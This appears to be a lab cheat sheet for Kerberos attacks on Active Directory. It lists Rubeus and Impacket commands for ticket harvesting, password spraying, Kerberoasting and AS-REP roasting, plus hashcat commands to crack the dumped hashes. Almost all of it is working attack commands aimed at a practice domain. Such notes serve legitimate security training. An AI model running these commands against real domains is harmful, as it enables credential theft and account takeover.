Rubeus
Rubeus include many tools and attacks include overpass the hash, ticket requests and renewals, ticket management, ticket extraction, harvesting, pass the ticket, AS-REP Roasting, and Kerberoasting, etc.
Harvesting Tickets
For pass the ticket attack
cd Downloads - navigate to the directory Rubeus is in
Rubeus.exe harvest /interval:30 - This command tells Rubeus to harvest for TGTs every 30 seconds
Brute-Forcing / Password-Spraying
In password spraying, you give a single password such as Password1 and "spray" against all found user accounts in the domain to find which one may have that password.
This attack will take a given Kerberos-based password and spray it against all found users and give a .kirbi ticket. This ticket is a TGT that can be used in order to get service tickets from the KDC as well as to be used in attacks like the pass the ticket attack.
Before password spraying with Rubeus, you need to add the domain controller domain name to the windows host file. You can add the IP and domain name to the hosts file from the machine by using the echo command:
echo MACHINE_IP CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts
cd Downloads - navigate to the directory Rubeus is in
Rubeus.exe brute /password:Password1 /noticket - This will take a given password and "spray" it against all found users then give the .kirbi TGT for that user
Kerberoasting
Rubeus
cd Downloads - navigate to the directory Rubeus is in
Rubeus.exe kerberoast This will dump the Kerberos hash of any kerberoastable users
copy the hash onto your attacker machine and put it into a .txt file so we can crack it with hashcat
hashcat -m 13100 -a 0 hash.txt wordlist.txt - now crack that hash
Impacket
Impacket Installation
cd /opt navigate to your preferred directory to save tools in
download the precompiled package from https://github.com/SecureAuthCorp/impacket/releases/tag/impacket_0_9_19
cd Impacket-0.9.19 navigate to the impacket directory
pip install . - this will install all needed dependencies
Kerberoasting w/ Impacket
cd /usr/share/doc/python3-impacket/examples/ - navigate to where GetUserSPNs.py is located
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip MACHINE_IP -request - this will dump the Kerberos hash for all kerberoastable accounts it can find on the target domain just like Rubeus does; however, this does not have to be on the targets machine and can be done remotely.
hashcat -m 13100 -a 0 hash.txt wordlist.txt - now crack that hash
AS-REP Roasting
AS-REP Roasting dumps the krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting these users do not have to be service accounts the only requirement to be able to AS-REP roast a user is the user must have pre-authentication disabled.
Dumping KRBASREP5 hashes
cd Downloads - navigate to the directory Rubeus is in
Rubeus.exe asreproast - This will run the AS-REP roast command looking for vulnerable users and then dump found vulnerable user hashes.
Crack hash with hashcat
Last updated
Was this helpful?